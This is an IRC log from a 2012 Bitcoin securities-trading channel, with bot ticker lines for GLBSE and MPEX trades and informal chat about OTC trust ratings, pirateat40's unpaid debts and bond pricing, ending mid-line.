[-] Aug 28 00:08:33 [GLBSE] [GSDPT] 150 @ 0.0034 = 0.51 BTC [+] Aug 28 00:08:53 [MPEX] [F.GIGA.ETF] 671 @ 0.00095629 = 0.6417 BTC [+] Aug 28 00:08:54 [MPEX] [F.GIGA.ETF] 3029 @ 0.00096344 = 2.9183 BTC [+] Aug 28 00:09:02 [GLBSE] [PUREMINING] 10 @ 0.0761 = 0.761 BTC [+] Aug 28 00:09:38 [GLBSE] [DMC] 1 @ 0.0599 BTC [+] Aug 28 00:11:06 [GLBSE] [GIGAMINING] 2 @ 0.92 = 1.84 BTC [+] Aug 28 00:12:06 [GLBSE] [BMMO] 10 @ 0.1 = 1 BTC [-] Aug 28 00:12:37 [GLBSE] [GSDPT] 294 @ 0.0034 = 0.9996 BTC [+] Aug 28 00:16:55 [GLBSE] [YABMC] 10 @ 0.135 = 1.35 BTC [+] Aug 28 00:22:33 [GLBSE] [CPA] 10 @ 0.0849 = 0.849 BTC [-] Aug 28 00:22:45 [MPEX] [S.MPOE] 21711 @ 0.00038455 = 8.349 BTC [+] Aug 28 00:22:46 [MPEX] [S.MPOE] 32389 @ 0.00038548 = 12.4853 BTC [+] Aug 28 00:30:25 [GLBSE] [FPGAMINING] 5 @ 0.9287 = 4.6435 BTC [-] Aug 28 00:30:27 [GLBSE] [FPGAMINING] 5 @ 0.9288 = 4.644 BTC [+] Aug 28 00:30:28 [GLBSE] [PUREMINING] 16 @ 0.09789 = 1.5662 BTC [+] Aug 28 00:31:04 [GLBSE] [PUREMINING] 1 @ 0.09789 BTC [+] Aug 28 00:35:44 [GLBSE] [OBSI.HRPT] 9 @ 0.105 = 0.945 BTC [+] Aug 28 00:37:32 [MPEX] [S.MPOE] 20431 @ 0.00038548 = 7.8757 BTC [+] Aug 28 00:37:34 [MPEX] [S.MPOE] 6757 @ 0.0003857 = 2.6062 BTC [+] Aug 28 00:37:35 [MPEX] [S.MPOE] 7212 @ 0.00038593 = 2.7833 BTC [+] Aug 28 00:39:45 [GLBSE] [UDN] 15 @ 0.1 = 1.5 BTC [-] Aug 28 00:44:19 [MPEX] [S.MPOE] 9500 @ 0.00038377 = 3.6458 BTC [-] Aug 28 00:44:20 [MPEX] [S.MPOE] 35321 @ 0.00038262 = 13.5145 BTC [-] Aug 28 00:50:11 [GLBSE] [OBSI.HRPT] 62 @ 0.1049 = 6.5038 BTC [-] Aug 28 01:03:46 [GLBSE] [OBSI.HRPT] 37 @ 0.1049 = 3.8813 BTC [-] Aug 28 01:03:47 [GLBSE] [OBSI.HRPT] 3 @ 0.1049 = 0.3147 BTC [-] Aug 28 01:05:17 [GLBSE] [OBSI.HRPT] 9 @ 0.1049 = 0.9441 BTC [-] Aug 28 01:05:58 [GLBSE] [GIGAMINING] 2 @ 0.9489 = 1.8978 BTC [+] Aug 28 01:08:45 [GLBSE] [OBSI.HRPT] 1 @ 0.1049 BTC [-] Aug 28 01:09:19 [GLBSE] [DMC] 20 @ 0.05 = 1 BTC [-] Aug 28 01:11:00 [MPEX] [F.GIGA.ETF] 10700 @ 0.00096344 = 10.3088 BTC [+] Aug 28 01:12:20 [GLBSE] [BTCASS_BOND_A] 10 @ 0.149 = 1.49 BTC [+] Aug 28 01:13:27 [GLBSE] [MMM] 60 @ 0.9 = 54 BTC [+] Aug 28 01:15:03 [GLBSE] [ZETA-MINING] 10 @ 0.15189 = 1.5189 BTC [-] Aug 28 01:17:34 [GLBSE] [YABMC] 10 @ 0.135 = 1.35 BTC [+] Aug 28 01:24:42 [GLBSE] [BTC-MINING] 1 @ 0.9899 BTC [+] Aug 28 01:25:18 [GLBSE] [TYGRR.BOND-PI] 12 @ 0.9999999 = 12 BTC [-] Aug 28 01:26:24 [GLBSE] [BITBOND] 1 @ 0.467 BTC [+] Aug 28 01:26:38 [GLBSE] [OBSI.HRPT] 4 @ 0.105 = 0.42 BTC [+] Aug 28 01:28:42 [GLBSE] [GIGAMINING] 2 @ 0.948899 = 1.8978 BTC [-] Aug 28 01:28:43 [GLBSE] [GIGAMINING] 6 @ 0.948999 = 5.694 BTC [+] Aug 28 01:28:44 [GLBSE] [GIGAMINING] 48 @ 0.949 = 45.552 BTC [+] Aug 28 01:28:45 [GLBSE] [GIGAMINING] 24 @ 0.95 = 22.8 BTC [+] Aug 28 01:30:22 [GLBSE] [PUREMINING] 2 @ 0.0976 = 0.1952 BTC [-] Aug 28 01:32:47 [MPEX] [S.MPOE] 2879 @ 0.00038262 = 1.1016 BTC [-] Aug 28 01:32:48 [MPEX] [S.MPOE] 15621 @ 0.0003824 = 5.9735 BTC [-] Aug 28 01:38:08 [MPEX] [S.MPOE] 22579 @ 0.0003824 = 8.6342 BTC [-] Aug 28 01:38:10 [MPEX] [S.MPOE] 8121 @ 0.00038225 = 3.1043 BTC [-] Aug 28 01:47:20 [MPEX] [S.MPOE] 5800 @ 0.00038267 = 2.2195 BTC [+] Aug 28 01:47:22 [MPEX] [S.MPOE] 3400 @ 0.00038593 = 1.3122 BTC [+] Aug 28 01:50:51 [GLBSE] [CPA] 9 @ 0.0849 = 0.7641 BTC [-] Aug 28 01:50:53 [GLBSE] [CPA] 19 @ 0.085 = 1.615 BTC [+] Aug 28 01:50:53 [GLBSE] [CPA] 72 @ 0.09 = 6.48 BTC [+] Aug 28 01:54:27 [GLBSE] [NYAN] 9 @ 0.9999 = 8.9991 BTC [-] Aug 28 01:56:43 [GLBSE] [CPA] 58 @ 0.09 = 5.22 BTC [+] Aug 28 01:58:57 [GLBSE] [OBSI.HRPT] 9 @ 0.105 = 0.945 BTC [+] Aug 28 02:06:49 [GLBSE] [PUREMINING] 10 @ 0.0974 = 0.974 BTC [-] Aug 28 02:08:33 [GLBSE] [OBSI.HRPT] 10 @ 0.10499 = 1.0499 BTC [-] Aug 28 02:09:32 [GLBSE] [PUREMINING] 10 @ 0.0974 = 0.974 BTC [-] Aug 28 02:10:42 [GLBSE] [BITBOND] 1 @ 0.467 BTC [+] Aug 28 02:10:55 [GLBSE] [PUREMINING] 10 @ 0.0976 = 0.976 BTC [+] Aug 28 02:11:49 [GLBSE] [ASICMINER] 1 @ 0.0985 BTC [+] Aug 28 02:13:57 [GLBSE] [FPGAMINING] 1 @ 0.9289 BTC [+] Aug 28 02:16:50 [GLBSE] [FPGAMINING] 1 @ 0.9289 BTC [+] Aug 28 02:18:02 [GLBSE] [OBSI.HRPT] 2 @ 0.105 = 0.21 BTC [+] Aug 28 02:20:48 [GLBSE] [M.ETF] 1 @ 0.1399 BTC [-] Aug 28 02:21:59 did i miss anything good ? Aug 28 02:22:56 nope, nothing happend Aug 28 02:23:04 that's good then Aug 28 02:23:05 ;;ticker Aug 28 02:23:06 Best bid: 10.85, Best ask: 10.878, Bid-ask spread: 0.02800, Last trade: 10.87081, 24 hour volume: 174403, 24 hour low: 10.54441, 24 hour high: 12.14999 Aug 28 02:26:30 [GLBSE] [OBSI.HRPT] 4 @ 0.105 = 0.42 BTC [+] Aug 28 02:28:44 oh Aug 28 02:28:55 there's a bid on s.dice for 0.00003000 Aug 28 02:29:24 that a bad thing ? Aug 28 02:29:28 [GLBSE] [OBSI.1MHS] 60 @ 0.094 = 5.64 BTC [+] Aug 28 02:30:19 not really, afaik Aug 28 02:30:25 [GLBSE] [TEEK.B] 2 @ 0.9989 = 1.9978 BTC [-] Aug 28 02:31:58 in other news, smex is coming along nicely Aug 28 02:32:17 :D Aug 28 02:32:36 that name. ehehehe. every time i see it it makes me grin Aug 28 02:33:41 well, i believe that a customer should be grinning after an interaction with their broker :) Aug 28 02:34:09 o hey, moar ppl on forum Aug 28 02:34:21 we should have a bet if it passes 100 users Aug 28 02:34:47 nice, i'll check it out in a few minutes after i'm BAK Aug 28 02:35:28 I bet 1 mircea_popescu that it will not. If it does, well I have to part with it by throwing it in the volcano. Aug 28 02:35:54 throwing what, the btc ? Aug 28 02:36:08 the 1 mircea_popescu that I bet Aug 28 02:36:14 lmao! Aug 28 02:36:29 So, gonna close it now? xD Aug 28 02:36:46 looking at the wot there's something like i dunno, 500 ? 1k ? ppl that might qualify Aug 28 02:37:21 ;;rated pirateat40 Aug 28 02:37:22 You have not yet rated user pirateat40 Aug 28 02:37:27 ;;getrating pirateat40 Aug 28 02:37:28 Currently authenticated from hostmask pirateat40!~pirateat4@unaffiliated/pirateat40 . User pirateat40, rated since Mon Aug 1 14:18:45 2011. Cumulative rating 247, from 78 total ratings. Received ratings: 78 positive, 0 negative. Sent ratings: 65 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40 Aug 28 02:37:36 0 negative eh ? i like this :D Aug 28 02:38:06 how come? Aug 28 02:38:21 [MPEX] [S.MPOE] 8100 @ 0.00038593 = 3.126 BTC [+] Aug 28 02:38:22 He has admin rights to the otc or just moderation? Aug 28 02:39:15 im saving that page. Aug 28 02:39:41 what otc, the irc chan you mean ? Aug 28 02:41:16 aye, I meant the rating system. Don't a few running this can remove ratings when someone abuse the otc ratings? Aug 28 02:41:23 no, but give -1, you prolly get on the imaginary end of line Aug 28 02:41:38 I think only nanotube has access to that tho Aug 28 02:41:49 I don't he admins it with other people? Aug 28 02:41:55 I don't think* Aug 28 02:42:22 BTC-Mining im sure nobody can remove ratings outside of nanotube who is pretty regimented to not do it. Aug 28 02:43:01 [MPEX] [S.MPOE] 2872 @ 0.00038226 = 1.0979 BTC [-] Aug 28 02:43:02 [MPEX] [S.MPOE] 39628 @ 0.00038225 = 15.1478 BTC [-] Aug 28 02:43:29 ;;rate pirateat40 -1 owes me money, not very talkative about anything, past his repayment delays. Aug 28 02:43:30 Rating entry successful. Your rating of -1 for user pirateat40 has been recorded. Aug 28 02:43:36 shit Aug 28 02:43:40 i was about to log in to pop his cherry Aug 28 02:43:58 Well I guess he has 1 bad rating now Aug 28 02:44:24 ;;rate pirateat40 -2 If you don't pay your debts, what do you get? A ruined OTC rating. Aug 28 02:44:25 Rating entry successful. Your rating of -2 for user pirateat40 has been recorded. Aug 28 02:44:47 [GLBSE] [GIGAMINING] 1 @ 0.95 BTC [+] Aug 28 02:44:49 [GLBSE] [BMMO] 3 @ 0.10000001 = 0.3 BTC [+] Aug 28 02:44:50 [GLBSE] [BMMO] 3 @ 0.1 = 0.3 BTC [-] Aug 28 02:44:59 !ticker gsdpt Aug 28 02:45:02 [GLBSE:GSDPT] [Bid: 0.0033] [Ask: 0.0034] [Spread: 0.0001] [Last: 0.0034] [24hVol: 122.8599] [7dAvg: 0.00372331] Aug 28 02:45:12 !ticker s.dice Aug 28 02:45:13 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (54805 shares, 186.34 BTC), 30day: 0.0032 / 0.00322854 / 0.0034 (2349905 shares, 7,586.78 BTC) Aug 28 02:45:26 ;;getrating pirateat40 Aug 28 02:45:26 Currently authenticated from hostmask pirateat40!~pirateat4@unaffiliated/pirateat40 . User pirateat40, rated since Mon Aug 1 14:18:45 2011. Cumulative rating 244, from 80 total ratings. Received ratings: 78 positive, 2 negative. Sent ratings: 65 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40 Aug 28 02:45:38 No one ever sent him negative ratings yet? Aug 28 02:45:39 he got a 2nd negative rating? Aug 28 02:45:46 Received ratings: 78 positive, 2 negative Aug 28 02:45:52 They're reversible when case is resolved... Aug 28 02:45:53 [GLBSE] [ASICMINER] 3 @ 0.09849 = 0.2955 BTC [-] Aug 28 02:45:58 ;;gettrust jcpham pirateat40 Aug 28 02:45:59 Trust relationship from user jcpham to user pirateat40: Level 1: 8, Level 2: 33 via 13 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=jcpham&dest=pirateat40 Aug 28 02:45:59 BTC-Mining: of course :P Aug 28 02:46:12 [GLBSE] [KRAKEN] 4 @ 0.01 = 0.04 BTC Aug 28 02:46:14 ;;gettrust pirateat40 Aug 28 02:46:15 Trust relationship from user boonies4u to user pirateat40: Level 1: 0, Level 2: 4 via 3 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=boonies4u&dest=pirateat40 Aug 28 02:46:33 The otc rating is made to put temporary ratings during disagreement Aug 28 02:46:42 Yes, i am here Aug 28 02:46:46 to encourage people not dealing with the person until disagreements are solved Aug 28 02:46:59 Why haven't people put negative rating while this gets solved? Aug 28 02:47:06 Well I'll be damned Aug 28 02:48:28 Is my graph suspect? Aug 28 02:48:47 jcpham0: i was just curious what rating you currently have on pirate Aug 28 02:49:22 It may change soon Aug 28 02:49:50 plenty of people doing 10s and shit. Aug 28 02:50:03 kinda silly in retrospect. Aug 28 02:50:03 ;;rate pirateat40 -1 there's a whole kerfuffle to be settled before i'd trade with him Aug 28 02:50:04 Rating entry successful. Your rating of -1 for user pirateat40 has been recorded. Aug 28 02:50:05 I'm not a 10er Aug 28 02:50:15 didn't mean you specifically. Aug 28 02:50:22 Gigavps has a joke 10 but i really trudt giga Aug 28 02:50:30 [MPEX] [S.MPOE] 41888 @ 0.00038593 = 16.1658 BTC [+] Aug 28 02:50:31 [MPEX] [S.MPOE] 2912 @ 0.00038631 = 1.1249 BTC [+] Aug 28 02:52:00 what's the date that the nano-involved bet settles? Aug 28 02:52:44 [GLBSE] [GMVT-BOT] 1 @ 0.17 BTC [-] Aug 28 02:53:50 [GLBSE] [M.ETF] 1 @ 0.1399 BTC [-] Aug 28 02:54:49 Maybe september 9th Aug 28 02:55:04 Idk tbh all of that is external to me Aug 28 02:55:24 I don't consider it to a contract i agreed upon Aug 28 02:56:37 [GLBSE] [ASICMINER] 12 @ 0.09849 = 1.1819 BTC [-] Aug 28 02:59:31 jcpham0: a sensible position Aug 28 03:05:28 omg phpbb doesn;t fuck up gpg code Aug 28 03:05:33 this is incredible. Aug 28 03:05:59 im at 0 on otc :) Aug 28 03:06:32 ;;getrating Chaaang-Noi Aug 28 03:06:33 This user has not yet been rated. WARNING: Currently not authenticated. Aug 28 03:06:39 omg scammeur Aug 28 03:06:40 mircea_popescu: it does if there is bb code inside of the signed part Aug 28 03:06:45 i know im a scammer Aug 28 03:06:58 i guess it would then huh. Aug 28 03:07:41 mircea_popescu: but it only effs up the display, you could hit the quote button and get the actual text Aug 28 03:08:33 aww so my nice security writeup got no comments Aug 28 03:08:38 what is wrong wit hpeople! Aug 28 03:09:51 [GLBSE] [ASICMINER] 4 @ 0.09849 = 0.394 BTC [-] Aug 28 03:12:30 [MPEX] [S.MPOE] 28355 @ 0.00038344 = 10.8724 BTC [-] Aug 28 03:17:10 [MPEX] [S.MPOE] 36154 @ 0.00038477 = 13.911 BTC [+] Aug 28 03:22:47 [MPEX] [S.MPOE] 16015 @ 0.00038477 = 6.1621 BTC [+] Aug 28 03:29:21 [GLBSE] [ASICMINER] 6 @ 0.09849 = 0.5909 BTC [-] Aug 28 03:32:24 mircea_popescu: I was going to comment on that thread with questions and didn't want to muddy the thread Aug 28 03:32:29 [GLBSE] [KRAKEN] 9000 @ 0.01 = 90 BTC Aug 28 03:33:29 BTCHero why not ? muddy it man Aug 28 03:33:34 that's a lot of explaining you've done there Aug 28 03:33:35 that's what the internet is for, muddy away Aug 28 03:34:16 I will muddy it up later for you :) Aug 28 03:35:08 [MPEX] [S.MPOE] 10185 @ 0.00038477 = 3.9189 BTC [+] Aug 28 03:35:10 [MPEX] [S.MPOE] 6 @ 0.00038631 = 0.0023 BTC [+] Aug 28 03:35:32 6 lol Aug 28 03:37:13 is it me or glbse loads a lot faster nao ? Aug 28 03:38:33 Total posts 42 • Total topics 11 • Total members 9 Aug 28 03:38:39 i wouldsay that is the meaning of life. Aug 28 04:06:44 [MPEX] [S.MPOE] 21845 @ 0.0003835 = 8.3776 BTC [-] Aug 28 04:06:46 [MPEX] [S.MPOE] 1092 @ 0.00038225 = 0.4174 BTC [-] Aug 28 04:09:09 [GLBSE] [MPOE.ETF] 1 @ 1.3 BTC [-] Aug 28 04:10:06 [MPEX] [S.MPOE] 49473 @ 0.000382 = 18.8987 BTC [-] Aug 28 04:13:59 [GLBSE] [BITCOINMINV] 4 @ 0.16 = 0.64 BTC [-] **** BEGIN LOGGING AT Tue Aug 28 08:30:29 2012 Aug 28 08:31:22 bitfoo done. Aug 28 08:31:31 thanks! Aug 28 08:34:16 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2701 BTC [-] Aug 28 08:35:35 when will pirates passthroughs be officially written off Aug 28 08:35:56 what do you mean? Aug 28 08:37:19 i think most people have by now, for their own books. Aug 28 08:37:30 [GLBSE] [KRAKEN] 500 @ 0.01 = 5 BTC Aug 28 08:39:18 I wouldn't be surprised if Pirate bought some debt from passthroughs under the table Aug 28 08:41:55 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.55 BTC [+] Aug 28 08:42:30 [GLBSE] [BIF.5-10.MININGBOND] 60 @ 0.6 = 36 BTC [+] Aug 28 08:42:56 [GLBSE] [BIF.5-10.MININGBOND] 60 @ 0.65 = 39 BTC [+] Aug 28 08:43:12 [GLBSE] [BIF.5-10.MININGBOND] 5 @ 0.65 = 3.25 BTC [+] Aug 28 08:43:23 [MPEX] [S.DICE] 258 @ 0.0034 = 0.8772 BTC [+] Aug 28 08:43:34 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.7 BTC [+] Aug 28 08:43:37 [MPEX] [B.MPCD.A] 9000 @ 0.0010088 = 9.0792 BTC [+] Aug 28 08:44:10 [MPEX] [S.MPOE] 1558 @ 0.00038663 = 0.6024 BTC [+] Aug 28 08:44:27 [GLBSE] [TYGRR.BOND-PI] 12 @ 0.9999999 = 12 BTC [-] Aug 28 08:47:56 boonies4u i suspect most of glbse pirate debt was bought by the issuers. Aug 28 08:48:13 the PPT issuers? Aug 28 08:48:20 [GLBSE] [OBSI.HRPT] 3 @ 0.104999 = 0.315 BTC [-] Aug 28 08:48:33 completely plausible Aug 28 08:50:46 i'm just going by volume. Aug 28 08:51:42 lol Aug 28 08:51:57 i kinda doubt that Aug 28 08:52:06 why ? Aug 28 08:52:19 well cuz i did not buy most of my bonds and im the largest Aug 28 08:52:26 iv bought and sold but im about even Aug 28 08:52:29 you issued ppt ? Aug 28 08:52:44 we're talking of the insured thing. Aug 28 08:52:48 i hold the largest assets by volume on glbse Aug 28 08:52:55 oh sorry Aug 28 08:52:57 i suspect the insurance proportion = the part not self bought. Aug 28 08:53:05 so, they insured in the end what, 32 cents to the dollar ? Aug 28 08:53:05 yes i bought back my insured bond Aug 28 08:53:14 my guess is they sold about 32 btc out of 100 "sold". Aug 28 08:53:14 i had one at 1btc face 100% insured Aug 28 08:53:22 i have about 75% bought back Aug 28 08:53:29 and i have a bid wall to absorb them all Aug 28 08:53:36 sorry about the mistake, i need to read more next time. Aug 28 08:53:59 [GLBSE] [TYGRR.BOND-PI] 12 @ 1 = 12 BTC [+] Aug 28 08:54:02 thats my isured bond Aug 28 08:54:04 no big deal either way eh ? Aug 28 08:54:04 Chaang-Noi I was half-kidding about the 0.9999999 technicality violation Aug 28 08:54:11 its no big deal Aug 28 08:54:45 i have to respond to all attacks on my business threads. i responded sarcasticly and was not really going to take downthat wall. Aug 28 08:55:48 [GLBSE] [BITNODES] 2 @ 0.25 = 0.5 BTC [-] Aug 28 08:56:05 mircea i will buy back all my insured bonds no matter what happens with pirate Aug 28 08:56:24 Chaaang-Noi: I'm sorry, I didn't mean it as an attack Aug 28 08:56:54 yeah but you said i was not following the contract. thus i had to respond Aug 28 08:57:08 i was not too worried and its not a big deal, but i had to respond. Aug 28 08:57:16 yes, i see Aug 28 08:58:06 [GLBSE] [BBBB] 85 @ 0.00025 = 0.0213 BTC [-] Aug 28 09:05:10 [GLBSE] [DMC] 2 @ 0.06 = 0.12 BTC [+] Aug 28 09:07:20 what happened, goat was trying to skimp on 10 satoshis? ;) Aug 28 09:07:49 goat's gotta goat Aug 28 09:08:01 bitfoo: I called him out on not following the contract (buying at 0.9999999 vs. 1.0 BTC) so ya Aug 28 09:08:17 i was half-joking Aug 28 09:08:37 oh, for the insured pirate thing Aug 28 09:09:19 In the future, each of those satoshi will be worth a fortune! : o Aug 28 09:09:41 or not =/ Aug 28 09:12:02 you can do a lot more with a satoshi than you can with the smallest division of USD Aug 28 09:13:19 it would have been like 300 satoshis Aug 28 09:13:35 300 bonds outstanding Aug 28 09:14:11 Can you even value bonds at the satoshi level on GLBSE? Aug 28 09:14:13 3000 satoshis then Aug 28 09:14:21 ahh yeah 3000 Aug 28 09:14:22 because it's 0.9999999 Aug 28 09:14:26 could have had an extra 9 :P Aug 28 09:14:27 .00003 BTC Aug 28 09:14:37 almost got a scammers tag for that! Aug 28 09:14:41 :) Aug 28 09:14:46 lol Aug 28 09:14:54 well, contract is a contract Aug 28 09:15:02 Boonies4u, I think the minimum valuation is at 7 decimals or 10 satoshi Aug 28 09:15:15 damn Aug 28 09:15:18 oh, no 8 decimals on GLBSE? Aug 28 09:15:20 yeah but as i pointed out im offering to buy back at 1 btc, they just have to send it to my account and email me a btc address... Aug 28 09:15:49 I'm mistaken, looks like it does go to 8 decimals Aug 28 09:15:51 ok ok, I'm not really serious either Aug 28 09:15:52 im not really breakig the contract Aug 28 09:15:54 just poking fun Aug 28 09:16:02 yeah its a bit silly Aug 28 09:16:20 just in a bad m00d due to pirate stuff Aug 28 09:16:36 understandable Aug 28 09:19:36 [GLBSE] [PUREMINING] 1 @ 0.09 BTC [-] Aug 28 09:19:43 ah fuck,anyone know what the last difficulty was? Aug 28 09:19:59 the previous one? Aug 28 09:20:01 yeah Aug 28 09:20:03 2.2 mil or so Aug 28 09:20:16 know where i can find a closer est? Aug 28 09:20:17 but I'm not a miner Aug 28 09:20:28 ;;bc,diff Aug 28 09:20:29 2440642.606916 Aug 28 09:20:32 ^^^ Aug 28 09:20:36 that's the current one Aug 28 09:20:40 ah Aug 28 09:20:50 i forgot to pay out my mining bond Aug 28 09:20:53 smickles http://polimedia.us/bitcoin/mpex.php?mpsic=S.BVPS grep "dividends" :p Aug 28 09:20:55 I can look it up in my mysql db Aug 28 09:20:57 stupid travel and pirates :) Aug 28 09:21:39 if its not too much trouble that would be awesome Aug 28 09:21:42 bitfoo i never understood wy they price things at 1btc on glbse either. Aug 28 09:22:04 i have the old one sec Aug 28 09:22:18 for a ppt 1 is a better number than say Pi.... Aug 28 09:22:29 I price my issues in bitcent Aug 28 09:22:33 except BTC-Mining Aug 28 09:22:43 2190865.97010286 Aug 28 09:22:47 my mining bond was .3 at first Aug 28 09:22:53 thanks mircea Aug 28 09:23:03 yes thanks Aug 28 09:23:05 2.2 was close Aug 28 09:23:09 i have the entire list if you want it. Aug 28 09:23:14 no thanks Aug 28 09:23:15 digging around this mysql db is a pain Aug 28 09:23:23 i just need to pay a bond Aug 28 09:24:06 BTC-Mining bitcents or something seems reasonable. Aug 28 09:24:17 anything in the 10^-2 to 10^-5 or so range Aug 28 09:24:39 yeah, BTC-Mining, I like how KRAKEN is split up Aug 28 09:25:08 I priced my loan bond and Kraken fund passthrough at 1 bitcent for easy reinvestment in full. Aug 28 09:25:20 [GLBSE] [NYAN.B] 1 @ 1 BTC [+] Aug 28 09:25:23 I priced BTC-Mining in larger shares of 1 BTC each Aug 28 09:25:28 ya. people don't understand this buyt suppose i have 100 btc to invest Aug 28 09:25:37 and must invest it 63% into something and 37% into something else. Aug 28 09:25:55 and now those things are priced in 3 btc increments and im wtf'd. Aug 28 09:26:06 Eh Aug 28 09:26:26 yeah, SS needs a stock-split desperately. (hint hint smickles) Aug 28 09:32:01 [GLBSE] [PUREMINING] 20 @ 0.095 = 1.9 BTC [+] Aug 28 09:32:59 [GLBSE] [PUREMINING] 45 @ 0.0959 = 4.3155 BTC [+] Aug 28 09:33:01 [GLBSE] [PUREMINING] 14 @ 0.096 = 1.344 BTC [+] Aug 28 09:34:29 [GLBSE] [PUREMINING] 45 @ 0.096 = 4.32 BTC [+] Aug 28 09:36:20 [GLBSE] [BFLS.RIG] 2 @ 0.9 = 1.8 BTC [-] Aug 28 09:36:21 [GLBSE] [BFLS.RIG] 3 @ 0.9 = 2.7 BTC [-] Aug 28 09:36:49 [MPEX] [S.DICE] 2800 @ 0.0034 = 9.52 BTC [+] Aug 28 09:36:55 [GLBSE] [JLP-BMD] 5 @ 0.075 = 0.375 BTC [-] Aug 28 09:36:57 !pl S.DICE 0.0034 Aug 28 09:36:57 Requesting data from GLBSE (might take a while). Aug 28 09:37:02 GLBSE 404 Aug 28 09:37:32 usagi ticker works. Aug 28 09:39:33 [GLBSE] [OBSI.HRPT] 10 @ 0.105 = 1.05 BTC [+] Aug 28 09:40:22 [15:20:49] i forgot to pay out my mining bond <--- scammer tag pls Aug 28 09:40:37 i know, im going to have like 50 of them Aug 28 09:40:47 i was to pay bonds like 15 hours ago and forgot Aug 28 09:40:51 no one calledme on it lol Aug 28 09:41:07 stockholm syndrome Aug 28 09:41:14 it's the new word everyone learnt on the forums Aug 28 09:45:25 [MPEX] [S.MPOE] 9733 @ 0.00038523 = 3.7494 BTC [-] Aug 28 09:45:26 [MPEX] [S.MPOE] 11467 @ 0.00038519 = 4.417 BTC [-] Aug 28 09:48:51 stockholm syndrome? how does this relate to the bonds? Aug 28 09:49:03 i think everyone is just too busy watching pirate and buying more popedcorn Aug 28 09:49:35 [GLBSE] [GOLD] 18 @ 0.00989 = 0.178 BTC [-] Aug 28 09:50:16 Chaaang-Noi: I should long popcorn Aug 28 09:50:24 :) Aug 28 09:50:38 it is technically a type of corn Aug 28 09:50:51 i'm sure there's a commodity ticker for it Aug 28 09:50:52 XD Aug 28 09:52:14 http://www.commoditymarketing.com/project/popcorn/ Aug 28 09:52:16 Oh Yeah Aug 28 09:54:57 [GLBSE] [ASICMINER] 20 @ 0.098489 = 1.9698 BTC [-] Aug 28 09:56:10 i see i sold my asicminer too soon and for too little Aug 28 09:56:14 stupid pirate:) Aug 28 09:56:17 [GLBSE] [ASICMINER] 3 @ 0.09848999 = 0.2955 BTC [+] Aug 28 09:56:19 [GLBSE] [ASICMINER] 97 @ 0.09849 = 9.5535 BTC [+] Aug 28 09:56:33 it's the new word everyone learnt on the forums << when this ?! Aug 28 09:56:43 yeah i dont get that either Aug 28 09:57:05 (im only asking cause i used it yest and im curious if wtf, when did it start) Aug 28 09:57:25 oh i have never even seen it Aug 28 09:57:36 the scammer tag ? Aug 28 09:58:44 im lost lol Aug 28 09:59:49 lol Aug 28 09:59:58 [GLBSE] [FUTUREFUND] 5 @ 0.00012189 = 0.0006 BTC [+] Aug 28 10:00:32 [GLBSE] [FUTUREFUND] 5 @ 0.00012189 = 0.0006 BTC [+] Aug 28 10:01:28 [GLBSE] [FUTUREFUND] 3 @ 0.00012189 = 0.0004 BTC [+] Aug 28 10:11:24 [GLBSE] [ASICMINER] 20 @ 0.09849 = 1.9698 BTC [+] Aug 28 10:13:39 [GLBSE] [TYGRR.BOND-PI] 6 @ 0.9999999 = 6 BTC [-] Aug 28 10:17:22 [MPEX] [F.GIGA.ETF] 4500 @ 0.0009489 = 4.2701 BTC [+] Aug 28 10:17:24 [MPEX] [F.GIGA.ETF] 1700 @ 0.00095091 = 1.6165 BTC [+] Aug 28 10:19:25 [MPEX] [S.BVPS] 187 @ 0.00348634 = 0.6519 BTC [-] Aug 28 10:19:26 [MPEX] [S.BVPS] 200 @ 0.00352303 = 0.7046 BTC [+] Aug 28 10:19:27 [MPEX] [S.BVPS] 250 @ 0.00354969 = 0.8874 BTC [+] Aug 28 10:19:28 [MPEX] [S.BVPS] 550 @ 0.00355355 = 1.9545 BTC [+] Aug 28 10:19:29 [MPEX] [S.BVPS] 13 @ 0.00375844 = 0.0489 BTC [+] Aug 28 10:22:45 [MPEX] [S.MPOE] 17300 @ 0.00038591 = 6.6762 BTC [+] Aug 28 10:22:46 [MPEX] [S.MPOE] 29776 @ 0.00038663 = 11.5123 BTC [+] Aug 28 10:22:47 [MPEX] [S.MPOE] 10609 @ 0.00038677 = 4.1032 BTC [+] Aug 28 10:24:59 [GLBSE] [ZETA-MINING] 50 @ 0.15189 = 7.5945 BTC [-] Aug 28 10:26:34 "I'm not gay but my gf is" Aug 28 10:30:18 [GLBSE] [BTCMC] 2 @ 0.46 = 0.92 BTC [-] Aug 28 10:30:53 [GLBSE] [BTCMC] 8 @ 0.4501 = 3.6008 BTC [-] Aug 28 10:31:36 [GLBSE] [BTCMC] 20 @ 0.45 = 9 BTC [-] Aug 28 10:39:09 [GLBSE] [ASICMINER] 50 @ 0.09849 = 4.9245 BTC [+] Aug 28 10:42:15 [GLBSE] [OBSI.ABMO] 15 @ 0.075 = 1.125 BTC [-] Aug 28 10:43:27 [GLBSE] [ASICMINER] 100 @ 0.09849 = 9.849 BTC [+] Aug 28 10:45:52 [MPEX] [F.GIGA.ETF] 2600 @ 0.00095091 = 2.4724 BTC [+] Aug 28 10:46:37 [GLBSE] [BDT] 10 @ 1.05 = 10.5 BTC [-] Aug 28 10:47:16 [GLBSE] [NYAN.B] 7 @ 1 = 7 BTC [+] Aug 28 10:50:24 so Aug 28 10:50:24 hitler Aug 28 10:50:28 he was bad Aug 28 10:50:44 funny thing though Aug 28 10:51:10 he only became a problem when he started killing OTHER countries people Aug 28 10:51:13 stupid man Aug 28 10:51:38 Mao, Stalin, Pol Pot all had in common that they killed their own people Aug 28 10:51:47 and we seem to be fine with that. Aug 28 10:52:14 that's a pretty good point. Aug 28 10:52:26 [MPEX] [F.GIGA.ETF] 14100 @ 0.00095091 = 13.4078 BTC [+] Aug 28 10:52:27 [MPEX] [F.GIGA.ETF] 4300 @ 0.00095932 = 4.1251 BTC [+] Aug 28 10:53:54 qalso Aug 28 10:54:05 hitler never played risk when he was a kid Aug 28 10:54:17 [GLBSE] [DMC] 89 @ 0.06 = 5.34 BTC [+] Aug 28 10:54:42 [GLBSE] 